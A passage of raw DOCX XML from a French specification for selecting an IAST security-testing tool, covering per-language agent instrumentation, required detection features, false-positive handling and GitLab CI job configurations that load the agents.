          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le parc applicatif étant poly-langage, l’agent IAST doit couvrir l’ensemble des technologies utilisées. Le tableau suivant détaille les exigences par langage :</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000"/>
        <w:gridCol w:w="1626"/>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Langage / Runtime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Mechanism d’instrumentation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Frameworks supportés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 spécifique</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Niveau exigence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Java / JVM</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Java Agent (-javaagent). Instrumentation bytecode via ASM/Javassist. Zéro modification du code.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Spring Boot, Spring MVC, Micronaut, Quarkus, Jakarta EE, Tomcat, Jetty, WildFly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JAVA_TOOL_OPTIONS ou CATALINA_OPTS. JVM 8+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Python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Agent injecté via middleware WSGI/ASGI ou monkey-patching. Import automatique via .pth ou sitecustomize.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Django, Flask, FastAPI, Starlette, aiohttp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pip install iast-agent + variable PYTHONSTARTUP ou middleware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Node.js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Agent chargé via --require ou import automatique (NODE_OPTIONS=--require).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Express, Fastify, NestJS, Hapi, Koa</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NODE_OPTIONS=--require /opt/iast/agent.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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.NET / 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CLR Profiling API. Attach via variables d’env CORECLR_ENABLE_PROFILING.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ASP.NET Core, ASP.NET, WebAPI, Azure Functions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CORECLR_ENABLE_PROFILING=1 + CORECLR_PROFILER_PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Go</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Instrumentation statique : recompilation avec lib IAST injectée. Pas de code modifié mais rebuild requis.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net/http, Gin, Echo, Fiber, gRPC-Go</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Injection via go:generate ou build flag -tags iast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="162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PHP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Agent PHP extension (.so). Auto-chargé via php.ini.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Laravel, Symfony, WordPress, Magento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extension=iast_agent.so dans php.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="162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Ruby</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Agent injecté via Rack middleware ou Gemfile.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Rails, Sinatra, Grape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gem 'iast-agent' + require dans application.rb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="162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4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE5CD"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Go : l’absence de mécanisme de bytecode dynamique implique une instrumentation statique (recompilation). Vérifier que l’outil retenu supporte Go nativement ou via un SDK dédié — certains outils ne le couvrent pas. Exiger une démonstration sur un service Go lors du benchmark.</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6.4   Features IAST à exiger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.1   Taint tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Suivi complet du flux de données depuis l’entrée (paramètre HTTP, header, body JSON/XML, cookie) jusqu’au sink dangereux (SQL query, shell exec, file write, log output, réponse HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Détection des vulnérabilités confirmées par exécution réelle : SQLi, XSS, SSRF, Path Traversal, XXE, Deserialization, Command Injection, LDAP Injection, Log Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Distinction source / sanitizer / sink : détection uniquement si le flux parcourt le chemin complet sans sanitization adéquate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.2   Détection des secrets et misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets en clair dans les réponses HTTP (tokens, clés API, mots de passe, IBAN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Détection des headers de sécurité manquants : HSTS, X-Frame-Options, CSP, X-Content-Type-Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode debug activé en production (stack traces exposées, messages d’erreur verbeux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithmes cryptographiques faibles détectés à l’exécution (MD5, SHA1, DES, RC4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.3   Gestion des faux positifs IAST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion par package : ne pas instrumenter les packages framework (`org.springframework.*`, `com.fasterxml.*`, `javax.servlet.*`) pour éviter les FP sur le code tiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion par sink : ne pas surveiller certains sinks jugés non sensibles dans le contexte (ex : logging interne sur un bus d’événements isolé)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Threshold de confiance : ne remonter que les findings avec confiance &gt; 80% (paramtrable selon la politique de l’établissement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Flows sanitizés hors scope : si la sanitization est effectuée par une lib non instrumentée, l’outil doit permettre de déclarer des sanitizers custom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.4   Intégration CI/CD multi-langages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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># ── Java / Spring Boot ──────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-java:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    JAVA_TOOL_OPTIONS: &gt;-</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      -javaagent:/opt/iast/agent.jar</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      -Diast.server.url=$IAST_SERVER_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      -Diast.api.key=$IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      -Diast.application.name=$CI_PROJECT_NAME</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      -Diast.sourcecode.enabled=true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [mvn test]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># ── Python / Django ─────────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-python:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  before_script:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    - pip install iast-agent --break-system-packages</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_SERVER_URL: $IAST_SERVER_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_API_KEY: $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    PYTHONSTARTUP: /opt/iast/sitecustomize.py</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [pytest tests/]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># ── Node.js / Express ───────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-node:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    NODE_OPTIONS: '--require /opt/iast/agent.js'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_SERVER_URL: $IAST_SERVER_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_API_KEY: $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [npm test]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># ── .NET / C# ────────────────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-dotnet:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
